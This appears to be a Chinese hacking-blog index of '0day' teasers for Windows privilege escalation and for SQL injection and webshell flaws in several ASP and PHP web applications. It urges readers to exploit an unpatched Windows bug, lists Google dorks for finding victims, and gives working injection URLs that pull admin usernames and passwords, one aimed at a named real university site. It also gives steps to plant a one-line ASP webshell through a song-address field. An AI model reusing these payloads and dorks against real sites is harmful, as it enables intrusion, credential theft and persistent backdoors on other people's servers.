谷歌工程师首发：windows最新0day 本地提谷歌果然卧虎藏龙，存在17年的漏洞编译至今通杀
测试英文版系统user提权没问题
中文有的会蓝屏 有的直接提权
此漏洞导致大部分系统可以提权，目前还没出补丁，及时利用吧。
windows最新0day 通杀所有版本

查看更多...

Tags: windowswindows 0day0day 提权提权

Xxasp网络硬盘v3.3.2 Sql injection 0day
至于这套系统我就不多介绍了,漏洞涉及文件为MyFiles.asp ShareList.asp,
我以ShareList.asp为例简单分析下,代码如下:
Dim MyOrderBy,MyCondition,MyTopField,SearchType,SearchCondition
SearchType=Trim(Request("SearchType"))

查看更多...

Tags: Xxasp网络硬盘Xxasp网络硬盘 0day0day

8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

数据库未作任何处理，可以插入一句话。继续插入经典一句话。┼攠數畣整爠煥敵瑳∨≡┩愾 密码a

Google： inurl:player.asp?classid 打开网页，点击 请你添加歌曲，在歌曲地址处插入一句话，提交，连接数据库即可。

查看更多...

Tags: 8603音乐网管理系统8603音乐网管理系统 0day0day

PSArt 新闻发布系统 PSArt Ver 1.2.0多文件存在Sql注入，裸奔的一套系统。

Google：Power by CNBaJing.CN

注入语句：http://www.sqnc.edu.cn/kxfzg/news.asp?id=128%20and%201=2%20union%20select%201,username,3,4,5,6,7,password,9%20from%20admin

查看更多...

Tags: PSArtPSArt 0day0day

漏洞报告:
http://www.jshell.cn/logview.asp?id=81
Google关键字:inurl:/Web-GuestView.asp
测试方法:
http://127.0.0.1/Company.asp?%69d=7%20or%201=2%20un%69on%20s%65lect%201,username,password,4,5,6,7,8%20fr%6Fm%20admin

查看更多...

Tags: 0day0day

conn.asp木有做好防注入,
ftbbsmyinfo.asp里又JB来一注入,绝配..
贴上ftbbsmyinfo.asp源码:

ASP/Visual Basic代码

查看更多...

Tags: FtbbsFtbbs 0day0day

作者：TheLostMind
本来比较忙，想整个站，发现这个0DAY还是很好的，写了个脚本自动扫描存在了漏洞的站点，至于说自动注射出帐号密码，还是不要了，不装X了。
网上看了下，貌似是零客网安0.S.T的“小蟑螂”大哥发现的~~
漏洞产生在member/member.php的第4行，代码如下：

查看更多...

Tags: phpcmsphpcms 0day0day 注射注射

作者：nuke

受影响程序： phpcms2008 gbk

漏洞文件：ask/search_ajax.php

查看更多...

Tags: 0day0day phpcmsphpcms SQLSQL InjectionInjection SQL注入SQL注入